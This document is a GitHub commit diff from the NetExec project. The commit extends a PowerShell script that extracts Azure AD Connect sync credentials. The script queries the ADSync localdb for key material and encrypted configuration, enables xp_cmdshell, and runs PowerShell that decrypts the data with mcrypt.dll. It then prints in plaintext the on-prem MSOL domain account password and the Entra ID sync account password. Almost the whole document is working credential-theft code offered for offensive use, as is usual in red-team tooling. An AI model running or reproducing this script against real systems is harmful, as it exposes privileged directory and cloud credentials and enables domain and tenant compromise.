Skip to content

Commit 665b77d

Browse files
NeffIsBackNeffIsBack
committed
Add semi working Extractor script for entra id creds
1 parent 23bee81 commit 665b77d

1 file changed

Lines changed: 59 additions & 21 deletions

File tree

nxc/data/entry-sync-creds/entry-sync-creds.ps1

Lines changed: 59 additions & 21 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,33 @@
11
# Original script by @_xpn_: https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c
2-
# Modified by @NeffIsBack
2+
# Modified by @NeffIsBack:
3+
# - Added support for Entra ID sync credentials (original source: https://github.com/Gerenios/AADInternals-Endpoints/blob/6af2054705e900b733ba76c6e65bfa6cad2328cc/AADSyncSettings.ps1#L108-L116)
4+
5+
# Function to decrypt the encrypted configuration of the Azure AD Connect sync stuff
6+
function decrypter($crypted, $key_id, $instance_id, $entropy) {
7+
$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
8+
9+
$cmd = $client.CreateCommand()
10+
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
11+
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
12+
EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
13+
$reader = $cmd.ExecuteReader()
14+
15+
$decrypted = [string]::Empty
16+
17+
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
18+
$decrypted += $reader.GetString(0)
19+
}
20+
$reader.Close()
21+
22+
if ($decrypted -eq [string]::Empty) {
23+
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
24+
return
25+
}
26+
27+
return $decrypted
28+
}
29+
30+
# Create a connection to the localdb instance of Azure AD Connect
331
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
432

533
try {
@@ -9,6 +37,7 @@ try {
937
return
1038
}
1139

40+
# Get the keyset_id, instance_id, and entropy from the mms_server_configuration table
1241
$cmd = $client.CreateCommand()
1342
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
1443
$reader = $cmd.ExecuteReader()
@@ -22,42 +51,51 @@ $instance_id = $reader.GetGuid(1)
2251
$entropy = $reader.GetGuid(2)
2352
$reader.Close()
2453

54+
# Get the encrypted data of the MSOL account for the on-prem AD
2555
$cmd = $client.CreateCommand()
2656
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
2757
$reader = $cmd.ExecuteReader()
2858
if ($reader.Read() -ne $true) {
29-
Write-Host "[!] Error querying mms_management_agent"
59+
Write-Host "[!] Error querying mms_management_agent for on-prem MSOL credentials"
3060
return
3161
}
3262

33-
$config = $reader.GetString(0)
34-
$crypted = $reader.GetString(1)
63+
$on_prem_config = $reader.GetString(0)
64+
$on_prem_crypted = $reader.GetString(1)
3565
$reader.Close()
3666

37-
$script = "add-type -path ''C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'';`$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager;`$km.LoadKeySet([guid]''$entropy'', [guid]''$instance_id'', $key_id);`$key = `$null;`$km.GetActiveCredentialKey([ref]`$key);`$key2 = `$null;`$km.GetKey(1, [ref]`$key2);`$decrypted = `$null;`$key2.DecryptBase64ToString(''$crypted'', [ref]`$decrypted);Write-Host `$decrypted"
67+
# Decrypt the on-premise MSOL credentials
68+
$msol_on_prem_decrypted = decrypter $on_prem_crypted $key_id $instance_id $entropy
3869

70+
# Get the encrypted data of the Entra ID sync credentials
3971
$cmd = $client.CreateCommand()
40-
$cmd.CommandText = "EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
41-
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
42-
EXEC xp_cmdshell 'powershell.exe -c `"$script`"'"
72+
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE subtype = 'Windows Azure Active Directory (Microsoft)'"
4373
$reader = $cmd.ExecuteReader()
44-
45-
$decrypted = [string]::Empty
46-
47-
while ($reader.Read() -eq $true -and $reader.IsDBNull(0) -eq $false) {
48-
$decrypted += $reader.GetString(0)
49-
}
50-
51-
if ($decrypted -eq [string]::Empty) {
52-
Write-Host "[!] Error using xp_cmdshell to launch our decryption powershell"
74+
if ($reader.Read() -ne $true) {
75+
Write-Host "[!] Error querying mms_management_agent for Entra ID sync credentials"
5376
return
5477
}
5578

56-
$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
57-
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
58-
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
79+
$entra_id_config = $reader.GetString(0)
80+
$entra_id_crypted = $reader.GetString(1)
81+
$reader.Close()
82+
83+
# Decrypt the Entra ID sync credentials
84+
$entra_id_decrypted = decrypter $entra_id_crypted $key_id $instance_id $entropy
85+
86+
# Extract the credentials from the decrypted XML configurations
87+
$domain = select-xml -Content $on_prem_config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerText}}
88+
$username = select-xml -Content $on_prem_config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerText}}
89+
$password = select-xml -Content $msol_on_prem_decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
5990

6091
Write-Host "[*] Credentials incoming..."
6192
Write-Host "On-prem Domain: $($domain.Domain)"
6293
Write-Host "On-prem Username: $($username.Username)"
63-
Write-Host "On-prem Password: $($password.Password)"
94+
Write-Host "On-prem Password: $($password.Password)"
95+
96+
# Extract the Entra ID sync credentials
97+
$entra_id_username = ([xml]$entra_id_config).MAConfig.'parameter-values'.parameter[0].'#text'
98+
$entra_id_password = select-xml -Content $entra_id_decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}
99+
Write-Host "[*] Entra ID sync credentials incoming..."
100+
Write-Host "Entra ID Username: $($entra_id_username)"
101+
Write-Host "Entra ID Password: $($entra_id_password.Password)"

0 commit comments

Comments
 (0)